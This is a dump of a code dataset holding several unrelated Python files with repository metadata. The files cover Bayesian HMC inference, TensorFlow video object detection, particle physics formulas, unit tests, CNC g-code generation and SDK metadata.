
# set the likelihood containing the model
# NOTE(review): x, data, sigma (and the true m, c used for the corner plot)
# come from the star-import of createdata above -- confirm definitions there.
y = Normal(loc=mp*x + cp, scale=sigma*tf.ones(len(data)))

# set number of samples
Nsamples = 2000 # final number of samples
Ntune = 2000 # number of tuning samples

# set parameters to infer: an Empirical holds one slot per HMC draw
qm = Empirical(params=tf.Variable(tf.zeros(Nsamples+Ntune)))
qc = Empirical(params=tf.Variable(tf.zeros(Nsamples+Ntune)))

# use Hamiltonian Monte Carlo
inference = ed.HMC({mp: qm, cp: qc}, data={y: data})
inference.run(step_size=1.5e-2) # higher steps sizes can lead to zero acceptance rates

# extract the samples, discarding the tuning draws
msamples = qm.params.eval()[Ntune:]
csamples = qc.params.eval()[Ntune:]

# stack into an (Nsamples, 2) array of (m, c) posterior samples
postsamples = np.vstack((msamples, csamples)).T

# plot posterior samples (if corner.py is installed)
try:
    import corner # import corner.py
except ImportError:
    sys.exit(1)

print('Number of posterior samples is {}'.format(postsamples.shape[0]))

fig = corner.corner(postsamples, labels=[r"$m$", r"$c$"], truths=[m, c])
fig.savefig('edward.png')
| [
"matthew.pitkin@ligo.org"
] | matthew.pitkin@ligo.org |
f89d60d03f53f6543a62034824916e850a8de360 | 51d05aa62e8c21d50bba116b795a003107d14e2a | /detection_app/object_detection_tf_multiprocessing.py | 8389dafb8c6ee25b1da5bc0830915e7e2414388b | [
"MIT"
] | permissive | Airyzf/object_detection_with_tensorflow | 7747659f4dcbca124ca9615872428152c1194204 | 301d1fe316aaa7579dae2b42babe4e8ace0a18e7 | refs/heads/master | 2021-08-24T15:20:33.349083 | 2017-12-10T06:45:03 | 2017-12-10T06:45:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,238 | py | import os
import tarfile
import tensorflow as tf
import multiprocessing
from multiprocessing import Queue
import time
import argparse
import logging
import numpy as np
import cv2
from myutil import downloadutil, fps_measure, queue_seq
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
# Command-line interface.
# NOTE(review): arguments are parsed at import time, so importing this module
# without -v/--video fails -- confirm this is only ever run as a script.
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-v', '--video', type=str, required=True,
                        help="video file for detection")
arg_parser.add_argument('-p', "--process", type=int, default=1,
                        help="# of detection process")
args = arg_parser.parse_args()

# What model to download.
# MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_08'
MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'
def load_graph(model_name=MODEL_NAME):
    """Fetch the model tarball if needed, extract the frozen graph, and load
    it into a fresh tf.Graph.
    """
    tarball = model_name + '.tar.gz'
    download_base = 'http://download.tensorflow.org/models/object_detection/'
    # Path to frozen detection graph. This is the actual model used for
    # object detection.
    ckpt_path = model_name + '/frozen_inference_graph.pb'

    downloadutil.maybe_download(os.getcwd(), tarball,
                                download_base + tarball)

    archive = tarfile.open(tarball)
    for member in archive.getmembers():
        if 'frozen_inference_graph.pb' in os.path.basename(member.name):
            archive.extract(member, os.getcwd())

    # Deserialize the frozen GraphDef into a new graph.
    graph = tf.Graph()
    with graph.as_default():
        graph_def = tf.GraphDef()
        with tf.gfile.GFile(ckpt_path, 'rb') as fid:
            graph_def.ParseFromString(fid.read())
            tf.import_graph_def(graph_def, name='')
    return graph
NUM_CLASSES = 90

def load_label_map(label_map_name, num_class):
    """Load the label map file and return a class-id -> category index."""
    # List of the strings that is used to add correct label for each box.
    labels_path = os.path.join('data', label_map_name)
    raw_map = label_map_util.load_labelmap(labels_path)
    categories = label_map_util.convert_label_map_to_categories(
        raw_map, max_num_classes=num_class, use_display_name=True)
    return label_map_util.create_category_index(categories)
def detect_object(detection_graph, sess, image, category_index):
    """Run one inference pass on `image` and draw the detections onto it.

    Args:
        detection_graph: tf.Graph holding the frozen detection model.
        sess: tf.Session bound to detection_graph.
        image: image as a numpy array (annotated in place).
        category_index: class-id -> label mapping for box captions.

    Returns:
        The same numpy array with boxes/labels drawn (score threshold 0.7).
    """
    with detection_graph.as_default():
        with sess.as_default() as sess:
            # Definite input and output Tensors for detection_graph
            image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
            # Each box represents a part of the image where a particular object was detected.
            detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
            # Each score represent how level of confidence for each of the objects.
            # Score is shown on the result image, together with the class label.
            detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
            detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
            num_detections = detection_graph.get_tensor_by_name('num_detections:0')
            image_np = image
            # Expand dimensions since the model expects images to have shape: [1, None, None, 3]
            image_np_expanded = np.expand_dims(image_np, axis=0)
            # Actual detection.
            (boxes, scores, classes, num) = sess.run(
                [detection_boxes, detection_scores, detection_classes, num_detections],
                feed_dict={image_tensor: image_np_expanded})
            # Visualization of the results of a detection (draws in place).
            vis_util.visualize_boxes_and_labels_on_image_array(
                image_np,
                np.squeeze(boxes),
                np.squeeze(classes).astype(np.int32),
                np.squeeze(scores),
                category_index,
                use_normalized_coordinates=True,
                line_thickness=8,
                min_score_thresh = 0.7)
            return image_np
# Build the shared model state once at import time so the worker processes
# inherit it when forked.
detection_graph = load_graph(model_name=MODEL_NAME)
category_index = load_label_map(label_map_name='mscoco_label_map.pbtxt', num_class=NUM_CLASSES)

# Bounded queues: raw frames in, annotated frames out. Queue_Seq presumably
# restores frame ordering from the worker pool -- confirm in myutil.queue_seq.
image_q = Queue(maxsize=200)
processed_q = queue_seq.Queue_Seq(maxsize=200)
# Producer: reads frames from the video file and feeds them into image_q.
def image_worker(image_q, video_file):
    """Decode video_file frame by frame and enqueue (index, RGB-frame) tuples."""
    logging.info("image worker start")
    capture = cv2.VideoCapture(video_file)
    ok, frame = capture.read()
    if not ok:
        logging.error("Can not read video file, please check!!!!")
    index = 0
    while ok:
        rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        image_q.put((index, rgb))
        logging.debug("put image into queue")
        ok, frame = capture.read()
        index += 1
    capture.release()
# Producer process: streams (frame_index, frame) pairs from the video into image_q.
input_process = multiprocessing.Process(target=image_worker, args=(image_q, args.video))
# Consumer: runs the TF detection graph on frames pulled from image_q.
def object_detection_worker(image_q, processed_q, detection_graph, category_index, fps=None):
    """Annotate frames from image_q and push (index, BGR frame) to processed_q.

    Runs forever; the owning process is expected to terminate() it.
    fps, when given, is a shared counter incremented once per processed frame.
    """
    print("detection worker start")
    # allow_growth avoids grabbing all GPU memory in every worker process.
    gpu_options = tf.GPUOptions(allow_growth=True)
    config = tf.ConfigProto(gpu_options=gpu_options)
    sess = tf.Session(graph=detection_graph, config=config)
    while True:
        frame_count, frame = image_q.get()
        # Bug fix: removed dead `t = time.time()` local that was assigned
        # but never read.
        ann_image = detect_object(detection_graph, sess, frame, category_index)
        # Convert back to BGR for OpenCV display in the main process.
        ann_image = cv2.cvtColor(ann_image, cv2.COLOR_RGB2BGR)
        if fps:
            fps.add_frame()
        processed_q.put((frame_count, ann_image))
def main():
    """Wire up producer/consumer processes and display annotated frames."""
    # configure logger
    logging.basicConfig(
        level=logging.INFO,
    )
    # setup fps counter
    fps = fps_measure.FPS()
    fps.start_count()
    # One detection process per --process, all sharing the same queues.
    detector_process = [multiprocessing.Process(target=object_detection_worker,
                        args=(image_q, processed_q, detection_graph, category_index, fps))
                        for i in range(args.process)]
    input_process.start()
    for p in detector_process:
        p.start()

    last_frame = -1
    while True:
        frame_count, ann_image = processed_q.get()
        font = cv2.FONT_HERSHEY_SIMPLEX
        cv2.putText(ann_image, 'FPS:{}'.format(int(fps.get_fps())), (50, 50), font, 2, (255, 255, 255), 2, cv2.LINE_AA)
        # check frame order; overlays a warning if a sequence break slips
        # through the ordering queue
        if last_frame != -1:
            if last_frame +1 != frame_count:
                cv2.putText(ann_image, "Frame order error", (100,100), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
        last_frame = frame_count
        cv2.imshow('frame', ann_image)
        # print("fps is:", fps.get_fps())
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

    # Tear down: the worker loops never exit on their own, so terminate()
    # before join().
    input_process.terminate()
    for p in detector_process:
        p.terminate()
    input_process.join()
    for p in detector_process:
        p.join()
    cv2.destroyAllWindows()

if __name__ == "__main__":
    main()
| [
"scotthuang1989@163.com"
] | scotthuang1989@163.com |
9c48335f00e4ce934b4c7957642e0f09ec30604b | 7c47e106c9ec85a7239c84c55ad5f20972edefcf | /particles/DustParticle.py | b4fb7a915db500a8b4446eb8d19a8df6c7c4a800 | [] | no_license | anasthesia/pyBBN | 11813717ad5023a9b29f9594ccde93fbc2d5a0c9 | 0e88604b765eb5ce2f196909c65cf2af11a8cc2f | refs/heads/master | 2021-01-21T03:37:46.309318 | 2016-05-10T12:03:50 | 2016-05-10T12:03:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | """
Non-relativistic simplifications of density, energy density and pressure calculations
"""
import numpy
import IntermediateParticle
name = 'dust'
def density(particle):
""" ## Density
\begin{equation}
n = g \left(\frac{M T}{2 \pi}\right)^{3/2} e^{-\frac{M}{T}}
\end{equation}
"""
return (
particle.dof
* numpy.sqrt(particle.mass * particle.T / 2. / numpy.pi)**3
* numpy.exp(- particle.mass / particle.T)
)
def energy_density(particle):
""" ## Energy density
\begin{equation}
\rho = n \left(M + \frac32 T\right)
\end{equation}
"""
return (particle.mass + 3./2. * particle.T) * density(particle)
def pressure(particle):
""" ## Pressure
\begin{equation}
p = n T
\end{equation}
"""
return density(particle) * particle.T
# ## Master equation terms
# Dust regime does not differ from intermediate regime here.
numerator = IntermediateParticle.numerator
denominator = IntermediateParticle.denominator
| [
"andrew.magalich@gmail.com"
] | andrew.magalich@gmail.com |
fcbdc26bdfbfc32229cd4c6209a56680ffbcab39 | 6e5ab77fee1fb4a0310213dd8c6dd8601828b1b9 | /Algorithm/Swea/D3_17937.py | c33b3d05a10f502e205aa35b54c042cc4e7d0f4a | [] | no_license | hongyong3/TIL | 36d031c0da9e3e6db3eebb977bd3e12df00a849f | 7f1492128e957a78fc95b255f4f7f2978161e471 | refs/heads/master | 2023-08-19T09:16:03.231757 | 2023-08-18T09:38:47 | 2023-08-18T09:38:47 | 162,100,258 | 1 | 0 | null | 2023-02-11T00:52:32 | 2018-12-17T08:42:42 | Jupyter Notebook | UTF-8 | Python | false | false | 198 | py | import sys
sys.stdin = open("D3_17937_input.txt", "r")
T = int(input())
for test_case in range(T):
A, B = map(int, input().split())
print("#{} {}".format(test_case + 1, A if A == B else 1)) | [
"chy66822495@gmail.com"
] | chy66822495@gmail.com |
6826c1f6a09f7b06ef7a2f2506da4f8233577248 | 880aeff2ae5d70c8a01c11f0c0d9f6154d390229 | /tests/test_scale_limits.py | 8a20d5b5de56b50c95df85b6a97b1f3ff8c79f99 | [
"CC0-1.0"
] | permissive | bellyfat/ccxt_rate_limiter | 8799c097589de876040521573f382f1615260609 | d37d675829eb2c1b89980c5001022b63c554ed90 | refs/heads/master | 2023-04-12T22:15:28.280063 | 2021-04-21T04:57:14 | 2021-04-21T04:57:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | from unittest import TestCase
from ccxt_rate_limiter import scale_limits
class TestScaleLimits(TestCase):
    """Unit tests for scale_limits()."""

    def test_scale_limits(self):
        # Scaling by 0.1 should divide every count by 10.
        limits = [
            {'tag': 'tag1', 'period_sec': 1, 'count': 10},
            {'tag': 'tag2', 'period_sec': 1, 'count': 20},
        ]
        scaled = scale_limits(limits, 0.1)
        self.assertEqual(scaled, [
            {'tag': 'tag1', 'period_sec': 1, 'count': 1},
            {'tag': 'tag2', 'period_sec': 1, 'count': 2},
        ])

    def test_input_not_changed(self):
        # scale_limits must not mutate the caller's list.
        original = [
            {'tag': 'tag1', 'period_sec': 1, 'count': 10},
        ]
        scale_limits(original, 0.1)
        self.assertEqual(original, [
            {'tag': 'tag1', 'period_sec': 1, 'count': 10},
        ])
| [
"a@example.com"
] | a@example.com |
0987bb7dede5a91338e72049a78083b1e8ac34ff | ef6229d281edecbea3faad37830cb1d452d03e5b | /ucsmsdk/methodmeta/PolicySetCentraleStorageMeta.py | e59ff3cebcf9e73fcfaa63776c0f7540eff10df3 | [
"Apache-2.0"
] | permissive | anoop1984/python_sdk | 0809be78de32350acc40701d6207631322851010 | c4a226bad5e10ad233eda62bc8f6d66a5a82b651 | refs/heads/master | 2020-12-31T00:18:57.415950 | 2016-04-26T17:39:38 | 2016-04-26T17:39:38 | 57,148,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | """This module contains the meta information of PolicySetCentraleStorage ExternalMethod."""
import sys, os
from ..ucscoremeta import MethodMeta, MethodPropertyMeta
# External-method descriptor: (class id, XML element name, introduced-in version).
method_meta = MethodMeta("PolicySetCentraleStorage", "policySetCentraleStorage", "Version142b")

# Property metadata: maps each field to its XML name, type, version,
# direction (Input/Output/InputOutput) and restriction flag.
prop_meta = {
    "cookie": MethodPropertyMeta("Cookie", "cookie", "Xs:string", "Version142b", "InputOutput", False),
    "in_data": MethodPropertyMeta("InData", "inData", "Xs:string", "Version142b", "Input", False),
    "in_oper": MethodPropertyMeta("InOper", "inOper", "Xs:unsignedInt", "Version142b", "Input", False),
    "in_side": MethodPropertyMeta("InSide", "inSide", "Xs:string", "Version142b", "Input", False),
    "out_data": MethodPropertyMeta("OutData", "outData", "Xs:string", "Version142b", "Output", False),
}

# XML attribute name -> python property name.
prop_map = {
    "cookie": "cookie",
    "inData": "in_data",
    "inOper": "in_oper",
    "inSide": "in_side",
    "outData": "out_data",
}
| [
"test@cisco.com"
] | test@cisco.com |
8e7744daac894e64ea037091c80cf88a8cc3ce3e | 3d962ed6a8d35929b1f24b8654634abef957f0c9 | /src/qanda/views.py | a3ef2751e4208ff6d1b938a708963272d9a31004 | [] | no_license | Michaeltetteh/stackoverflowclone | 44a98ac9c809b5597bf30921166fcc66961a3a16 | 7d086f3aa3098eb6636145f2c3ba43168275cc8a | refs/heads/master | 2020-06-07T03:33:43.664983 | 2019-07-12T18:59:46 | 2019-07-12T18:59:46 | 192,911,917 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,176 | py | from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import (
CreateView,
DetailView,
RedirectView,
DayArchiveView,
UpdateView,
TemplateView,
)
from django.shortcuts import render
from .forms import (
QuestionForm,
AnswerForm,
AnswerAcceptanceForm,
)
from .models import Question,Answer
from django.http import HttpResponseBadRequest
from django.urls import reverse
from django.utils import timezone
from .service.elasticsearch import search_for_questions
class AskQuestionView(LoginRequiredMixin, CreateView):
    """Lets an authenticated user draft, preview and save a question."""
    form_class = QuestionForm
    template_name = 'qanda/ask.html'

    def get_initial(self):
        # Pre-bind the question to the logged-in user.
        return {'user': self.request.user.id}

    def form_valid(self, form):
        action = self.request.POST.get('action')
        if action == 'PREVIEW':
            # Render an unsaved Question so the template can show a preview.
            preview = Question(
                question=form.cleaned_data['question'],
                title=form.cleaned_data['title'],
            )
            return self.render_to_response(
                context=self.get_context_data(preview=preview))
        if action == 'SAVE':
            return super().form_valid(form)
        return HttpResponseBadRequest()
class QuestionDetailView(DetailView):
    """Shows a question plus the answer form and, for the question's owner,
    the accept/reject forms for its answers."""
    model = Question

    ACCEPT_FORM = AnswerAcceptanceForm(initial={'accepted': True})
    REJECTED_FORM = AnswerAcceptanceForm(initial={'accepted': False})

    def get_context_data(self, **kwargs):
        ctx = super().get_context_data(**kwargs)
        ctx['answer_form'] = AnswerForm(initial={
            'user': self.request.user.id,
            'question': self.object.id,
        })
        if self.object.can_accept_answers(self.request.user):
            ctx['accept_form'] = self.ACCEPT_FORM
            ctx['reject_form'] = self.REJECTED_FORM
        return ctx
class CreateAnswerView(LoginRequiredMixin, CreateView):
    """Lets an authenticated user draft, preview and post an answer."""
    form_class = AnswerForm
    template_name = 'qanda/create_answer.html'

    def get_question(self):
        # The question being answered, identified by the URL's pk.
        return Question.objects.get(pk=self.kwargs['pk'])

    def get_initial(self):
        return {
            'question': self.get_question().id,
            'user': self.request.user.id,
        }

    def get_context_data(self, **kwargs):
        return super().get_context_data(question=self.get_question(), **kwargs)

    def get_success_url(self):
        return self.object.question.get_absolute_url()

    def form_valid(self, form):
        action = self.request.POST.get('action')
        if action == 'PREVIEW':
            preview_ctx = self.get_context_data(preview=form.cleaned_data['answer'])
            return self.render_to_response(context=preview_ctx)
        if action == 'SAVE':
            return super().form_valid(form)
        return HttpResponseBadRequest()
class UpdateAnswerAccepetance(LoginRequiredMixin, UpdateView):
    """Marks an answer accepted or rejected via AnswerAcceptanceForm.

    (The misspelled class name is kept for backward compatibility with the
    URL configuration that references it.)
    """
    form_class = AnswerAcceptanceForm
    queryset = Answer.objects.all()
    template_name = "qanda/common/list_answers.html"

    def get_success_url(self):
        return self.object.question.get_absolute_url()

    def form_invalid(self, form):
        # Bug fix: HttpResponseBadRequest accepts no ``redirect_to`` keyword
        # (that argument belongs to HttpResponseRedirect), so the original
        # call raised TypeError at runtime instead of returning HTTP 400.
        return HttpResponseBadRequest()
class DailyQuestionList(DayArchiveView):
    """Archive page listing the questions created on a given day."""
    queryset = Question.objects.all()
    date_field = 'created'
    month_format = '%m'
    allow_empty = True
class TodaysQuestionList(RedirectView):
    """Redirects to the daily question list for the current date."""

    def get_redirect_url(self, *args, **kwargs):
        now = timezone.now()
        return reverse(
            'qanda:daily_questions',
            kwargs={
                'year': now.year,
                'month': now.month,
                'day': now.day,
            },
        )
class SearchView(TemplateView):
    """Runs a full-text question search and renders the hits."""
    template_name = 'qanda/search.html'

    def get_context_data(self, **kwargs):
        query = self.request.GET.get('q', None)
        ctx = super().get_context_data(query=query, **kwargs)
        if query:
            ctx['hits'] = search_for_questions(query)
        return ctx
| [
"miketetteh751@outlook.com"
] | miketetteh751@outlook.com |
127cf91a36cce18269d93f055cf62345174901b7 | 45870a80cbe343efe95eb9e8d0bd47c8c88353d1 | /特殊的函数/venv/Lib/site-packages/tensorflow/tools/api/generator/api/errors/__init__.py | ef90b8fb905ffd54a01f8504bd2d3b233f1a0383 | [] | no_license | pippichi/IntelliJ_PYTHON | 3af7fbb2c8a3c2ff4c44e66736bbfb7aed51fe88 | 0bc6ded6fb5b5d9450920e4ed5e90a2b82eae7ca | refs/heads/master | 2021-07-10T09:53:01.264372 | 2020-07-09T13:19:41 | 2020-07-09T13:19:41 | 159,319,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,608 | py | """Imports for Python API.
This file is MACHINE GENERATED! Do not edit.
Generated by: tensorflow/tools/api/generator/create_python_api.py script.
"""
from tensorflow.python import OpError
from tensorflow.python.framework.errors import AbortedError
from tensorflow.python.framework.errors import AlreadyExistsError
from tensorflow.python.framework.errors import CancelledError
from tensorflow.python.framework.errors import DataLossError
from tensorflow.python.framework.errors import DeadlineExceededError
from tensorflow.python.framework.errors import FailedPreconditionError
from tensorflow.python.framework.errors import InternalError
from tensorflow.python.framework.errors import InvalidArgumentError
from tensorflow.python.framework.errors import NotFoundError
from tensorflow.python.framework.errors import OutOfRangeError
from tensorflow.python.framework.errors import PermissionDeniedError
from tensorflow.python.framework.errors import ResourceExhaustedError
from tensorflow.python.framework.errors import UnauthenticatedError
from tensorflow.python.framework.errors import UnavailableError
from tensorflow.python.framework.errors import UnimplementedError
from tensorflow.python.framework.errors import UnknownError
from tensorflow.python.framework.errors import error_code_from_exception_type
from tensorflow.python.framework.errors import exception_type_from_error_code
from tensorflow.python.framework.errors import raise_exception_on_not_ok_status
from tensorflow.python.framework.errors_impl import ABORTED
from tensorflow.python.framework.errors_impl import ALREADY_EXISTS
from tensorflow.python.framework.errors_impl import CANCELLED
from tensorflow.python.framework.errors_impl import DATA_LOSS
from tensorflow.python.framework.errors_impl import DEADLINE_EXCEEDED
from tensorflow.python.framework.errors_impl import FAILED_PRECONDITION
from tensorflow.python.framework.errors_impl import INTERNAL
from tensorflow.python.framework.errors_impl import INVALID_ARGUMENT
from tensorflow.python.framework.errors_impl import NOT_FOUND
from tensorflow.python.framework.errors_impl import OK
from tensorflow.python.framework.errors_impl import OUT_OF_RANGE
from tensorflow.python.framework.errors_impl import PERMISSION_DENIED
from tensorflow.python.framework.errors_impl import RESOURCE_EXHAUSTED
from tensorflow.python.framework.errors_impl import UNAUTHENTICATED
from tensorflow.python.framework.errors_impl import UNAVAILABLE
from tensorflow.python.framework.errors_impl import UNIMPLEMENTED
from tensorflow.python.framework.errors_impl import UNKNOWN | [
"874496049@qq.com"
] | 874496049@qq.com |
7723b40c756b824d50377be7a404363e77475980 | d3192b76f276d5102b231baf470f32d39a5e4854 | /test/StimulusSelector_tests.py | 2bf4a0c195b04eb5a0c9e5d1bc93d9af884989f2 | [] | no_license | drordotan/trajtracker | 874529e1c253f6d2c7527967616adf1c03977e05 | f76693c14d649899cfab5b2bbad4835dbf1cd15c | refs/heads/master | 2021-06-15T05:31:06.404147 | 2017-03-27T18:49:21 | 2017-03-27T18:49:21 | 81,454,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | import unittest
import trajtracker
from trajtracker.stimuli import StimulusSelector
from ttrk_testing import DummyStimulus
class StimulusSelectorTests(unittest.TestCase):
    """Tests for StimulusSelector activation behaviour."""

    def test_select(self):
        stim_a = DummyStimulus()
        stim_b = DummyStimulus()
        selector = StimulusSelector([["a", stim_a], ["b", stim_b]])

        # Nothing is active until activate() is called.
        self.assertIsNone(selector.active_stimulus)

        selector.activate("a")
        self.assertEqual(stim_a, selector.active_stimulus)

        selector.activate("b")
        self.assertEqual(stim_b, selector.active_stimulus)

    def test_select_invalid(self):
        # Activating an unknown key must raise ValueError.
        selector = StimulusSelector([["a", DummyStimulus()]])
        self.assertRaises(ValueError, lambda: selector.activate("c"))

if __name__ == '__main__':
    unittest.main()
| [
"dror.dotan@gmail.com"
] | dror.dotan@gmail.com |
529315e1618e7474cbfb659adba1527cede96ec3 | dae7646a7780d471c32ec9dbe637445aa039b082 | /cnc/flybox_178x133x10/slots/fixture/pocket.py | d19d779125c2ccc3438e9b9350e9f2da6e3e35d9 | [
"Apache-2.0"
] | permissive | iorodeo/flybox_two_chamber | 249dc805074a7c5d2d9d7a8ebec7c3e9c18a792d | d3e24b3fded55308fff8bb95abb2ed97cb2d4465 | refs/heads/master | 2022-11-09T20:31:37.968775 | 2015-04-23T00:56:58 | 2015-04-23T00:56:58 | 273,790,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,250 | py | from __future__ import print_function
import os
import sys
from py2gcode import gcode_cmd
from py2gcode import cnc_dxf
# Machining parameters.
# NOTE(review): units follow the DXF drawing -- presumably inches; confirm.
feedrate = 150.0
fileName = 'flybox_178x133x10.dxf'
depth = 0.120
startZ = 0.0
safeZ = 0.5
overlap = 0.5
overlapFinish = 0.6
maxCutDepth = 0.15
toolDiam = 0.5
cornerCut = True
direction = 'ccw'
startDwell = 1.0

# Program preamble: generic start block, spacer, feed rate.
prog = gcode_cmd.GCodeProg()
prog.add(gcode_cmd.GenericStart())
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.FeedRate(feedrate))

# Pocketing operation driven by the POCKET layer of the DXF file.
param = {
    'fileName'      : fileName,
    'layers'        : ['POCKET'],
    'components'    : True,
    'depth'         : depth,
    'startZ'        : startZ,
    'safeZ'         : safeZ,
    'overlap'       : overlap,
    'overlapFinish' : overlapFinish,
    'maxCutDepth'   : maxCutDepth,
    'toolDiam'      : toolDiam,
    'cornerCut'     : cornerCut,
    'direction'     : direction,
    'startDwell'  : startDwell,
}
pocket = cnc_dxf.DxfRectPocketFromExtent(param)
prog.add(pocket)
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.End(),comment=True)

# Write the program next to this script as <scriptname>.ngc.
# (Note: fileName is reused here, shadowing the DXF name above.)
baseName, dummy = os.path.splitext(__file__)
fileName = '{0}.ngc'.format(baseName)
print('generating: {0}'.format(fileName))
prog.write(fileName)
| [
"will@iorodeo.com"
] | will@iorodeo.com |
fbfc6ebef270cae196f812b58597f0589713b520 | 1610e03bc2b9b8419e11824079de3c8636f3a039 | /0x0A-python-inheritance/1-my_list.py | 4db9209230a10b8ff001d267f86007a96f27b635 | [] | no_license | Andresmelek/holbertonschool-higher_level_programming | 12afc1d94b1cd8dcdcfbeb1f9dc819999506afb8 | a1969506f346b808450e33f91d37790732ee7c57 | refs/heads/master | 2020-09-28T23:40:49.866556 | 2020-05-14T17:52:53 | 2020-05-14T17:52:53 | 226,893,592 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 133 | py | #!/usr/bin/python3
"""
Subclas my list from list.
"""
class MyList(list):
    """A list that can print itself in ascending sorted order."""

    def print_sorted(self):
        """Print a sorted copy of the list; the list itself is unchanged."""
        ordered = sorted(self)
        print(ordered)
| [
"candres.isaza@gmail.com"
] | candres.isaza@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.